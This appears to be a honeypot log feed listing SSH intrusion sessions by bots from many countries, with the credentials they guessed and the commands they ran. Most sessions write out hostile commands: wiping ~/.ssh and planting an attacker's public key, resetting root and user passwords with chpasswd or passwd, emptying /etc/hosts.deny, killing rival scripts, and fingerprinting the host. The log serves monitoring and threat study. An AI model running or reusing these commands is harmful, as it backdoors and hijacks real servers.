$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ex8EE8ayPKtc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_59 (181.167.144.229) β€” Buenos Aires, Argentina Β· 1 session Β· 19 cmds
2026-05-24 03:05 EDT Β· as root/qwe123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:es40oCwHqOVv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_57 (102.223.92.101) β€” Koforidua, Ghana Β· 1 session Β· 20 cmds
2026-05-24 02:58 EDT Β· as john/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nx2FjNtihqsnk\nx2FjNtihqsnk"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nx2FjNtihqsnk\nx2FjNtihqsnk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_35 (107.172.219.179) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-24 02:55 EDT Β· as user/user
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user\nOvPlLdgDiDGd\nOvPlLdgDiDGd"|passwd|bash
$ Enter new UNIX password:
$ echo "user\nOvPlLdgDiDGd\nOvPlLdgDiDGd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_17 (115.68.208.117) β€” Gwangmyeong, South Korea Β· 2 sessions Β· 38 cmds
2026-05-24 02:42 EDT Β· as root/Admin2024, root/Password1!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:JvYJeSgi9RwJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:tcP2rthcWWPr"|chpasswd|bash
🎭 wraith_root_64 (103.187.146.107) β€” Jakarta, Indonesia Β· 2 sessions Β· 38 cmds
2026-05-24 02:43 EDT Β· as root/Admin2024, root/Password1!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:ZhYSZTo3KjLi"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:mYstazPNhHWk"|chpasswd|bash
🎭 bibimbap (49.247.37.22) β€” Gwangmyeong, South Korea Β· 1 session Β· 20 cmds
2026-05-24 02:26 EDT Β· as lukas/lukas
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "lukas\nzbwHA8Z5Z3xb\nzbwHA8Z5Z3xb"|passwd|bash
$ Enter new UNIX password:
$ echo "lukas\nzbwHA8Z5Z3xb\nzbwHA8Z5Z3xb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 windmill_sol_2 (192.109.200.78) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-24 01:59 EDT Β· as hzx/hzx, raaj/raaj123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 rogue_root_71 (212.227.246.98) β€” Madrid, Spain Β· 2 sessions Β· 38 cmds
2026-05-24 01:38 EDT Β· as root/!QAZxsw2#EDC, root/Aa@12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:e1QuudWBVEUP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:nQOAehlBJWaX"|chpasswd|bash
🎭 bistro_root_7 (146.59.239.9) β€” Gravelines, France Β· 2 sessions Β· 39 cmds
2026-05-24 01:42 EDT Β· as admin/adminadminadmin, root/!QAZxsw2#EDC
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "adminadminadmin\ntABcnIJRMwb9\ntABcnIJRMwb9"|passwd|bash
$ Enter new UNIX password:
$ echo "adminadminadmin\ntABcnIJRMwb9\ntABcnIJRMwb9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:vfJkr69eLMF9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 rogue_root_72 (110.164.228.242) β€” Pak Kret, Thailand Β· 1 session Β· 20 cmds
2026-05-24 01:44 EDT Β· as raaj/raaj123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "raaj123\nFhpzwJ9U2m0a\nFhpzwJ9U2m0a"|passwd|bash
$ Enter new UNIX password:
$ echo "raaj123\nFhpzwJ9U2m0a\nFhpzwJ9U2m0a\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ramen_root_4 (43.128.237.224) β€” Tokyo, Japan Β· 1 session Β· 19 cmds
2026-05-24 01:30 EDT Β· as root/ddd123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:OsIpEja5p8kX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_4 (206.189.205.240) β€” North Bergen, United States Β· 1 session Β· 1 cmd
2026-05-24 01:09 EDT Β· as jimster/Jimster2021!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_58 (202.10.38.181) β€” Melati, Indonesia Β· 3 sessions Β· 58 cmds
2026-05-22 15:07 EDT Β· as info/test123, root/Asdqwe123, root/QAZwsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:m0b0IccrTiJx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:7SqMsAoKen7z"|chpasswd|bash
$ echo -e "test123\nvygIRuhTUrIc\nvygIRuhTUrIc"|passwd|bash
$ Enter new UNIX password:
$ echo "test123\nvygIRuhTUrIc\nvygIRuhTUrIc\n"|passwd
🎭 jade_root_15 (223.76.158.107) β€” Wuhan, China Β· 1 session Β· 19 cmds
2026-05-24 00:48 EDT Β· as root/Asdqwe123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:VxfxsumbUmb8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_8 (103.180.165.99) β€” Prapen, Indonesia Β· 1 session Β· 1 cmd
2026-05-24 00:37 EDT Β· as jimster/Jimster@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_78 (14.225.217.203) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-23 23:52 EDT Β· as jimster/admin!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monet_root_6 (161.97.169.29) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-23 23:23 EDT Β· as root/test2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 barbie_root (51.161.202.234) β€” Sydney, Australia Β· 1 session Β· 19 cmds
2026-05-23 23:19 EDT Β· as root/Root@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
